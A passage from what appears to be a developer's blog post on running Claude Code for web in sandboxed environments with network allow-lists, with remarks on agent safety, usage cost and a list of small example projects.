custom environment with your own allow-list. I have one called "Everything" which allow-lists "*", because for projects like my MiniJinja/Jinja2 comparison above there are no secrets or source code involved that need protecting. I see Anthropic's focus on sandboxes as an acknowledgment that coding agents run in YOLO mode ( and the like) are enormously more valuable and productive than agents where you have to approve their every step. The challenge is making it convenient and easy to run them safely. This kind of sandboxing kind is the only approach to safety that feels credible to me. Update : A note on cost: I'm currently using a Claude "Max" plan that Anthropic gave me in order to test some of their features, so I don't have a good feeling for how Claude Code would cost for these kinds of projects. From running (an unofficial cost estimate tool ) it looks like I'm using between $1 and $5 worth of daily Claude CLI invocations at the moment. You are only seeing the long-form articles from my blog. Subscribe to /atom/everything/ to get all of my posts, or take a look at my other subscription options . Add query-string-stripper.html tool against my simonw/tools repo - a very simple task that creates (and deployed via GitHub Pages) this query-string-stripper tool. minijinja vs jinja2 Performance Benchmark - I ran this against a private repo and then copied the results here, so no PR. Here's the prompt I used. Update deepseek-ocr README to reflect successful project completion - I noticed that the README produced by Claude Code CLI for this project was misleadingly out of date, so I had Claude Code for web fix the problem.

0 views